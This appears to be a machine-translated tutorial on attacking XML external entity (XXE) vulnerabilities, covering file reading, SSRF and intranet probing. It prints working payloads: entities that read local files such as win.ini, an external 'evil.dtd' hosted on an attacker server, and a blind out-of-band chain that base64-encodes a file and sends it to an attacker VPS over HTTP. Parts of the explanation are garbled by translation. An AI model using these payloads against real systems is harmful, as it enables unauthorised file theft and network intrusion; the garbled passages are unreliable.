Vulnerability attack and defense test
table of Contents
Overview
Using the xxe vulnerability, a denial of service attack (insert DOS attack), file reading, command (code) execution (need to compile and install PHP, the command execution module is also installed), SQL (XSS) injection, internal and external scanning ports Remote inclusion vulnerability), intrusion into intranet sites, etc. Intranet detection and intrusion use the protocols supported in xxe for intranet host and port discovery. It can be understood that xxe is used for SSRF utilization, basically all can be done
Generally, xxe utilization is divided into two major scenarios : with echo and without echo. If there is an echo, you can see the execution result or phenomenon of Payload directly on the page. If there is no echo, it is also called blind xxe. You can use the external data channel to extract data.
There is an echo
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>
外部 evil.dtd 中的内容。
<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >
No echo
You can use the external data channel to extract data, first use php: // filter to obtain the content of the target file, and then send the content to the data receiving server (attack server VPS) xxx.xxx.xxx
<!DOCTYPE convert [<!ENTITY % remote SYSTEM "http://ip/test.dtd">%remote;%int;%send;]>
If there is an error, you can directly view the error information. If you
do not report an error, you need to access the log information in the server that receives the data. You can see the data encoded by base64. After decoding, you can get the data.
We clearly see that the server has received the sensitive file information that we encoded with base64 (encoding is also
not to destroy the original XML syntax), without encoding will report an error
The whole calling process
We can see from the payload in successive calls to the three Remote parameter entity%;% int;% the send ;, this is our use of the order,% remote first call, the call request test.dtd on a remote server, somewhat similar Include test.dtd, then% int calls% file in test.dtd,% file will get the sensitive file on the server, and then fill the result of% file into% send (because the value of the entity cannot be There is%, so it is converted into HTML entity encoding%), we then call% send; Send our read data to our remote vps, so that the effect of out-of-band data is achieved, which is perfectly solved XXE There is no echo problem.
For the content of test.dtd, the internal% number should be physically encoded into & # 37 (Note: for encoding, please refer to: http://www.mamicode.com/info-detail-1680849.html)
<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM'http://192.168.0.105:8080?p=%file;'>">
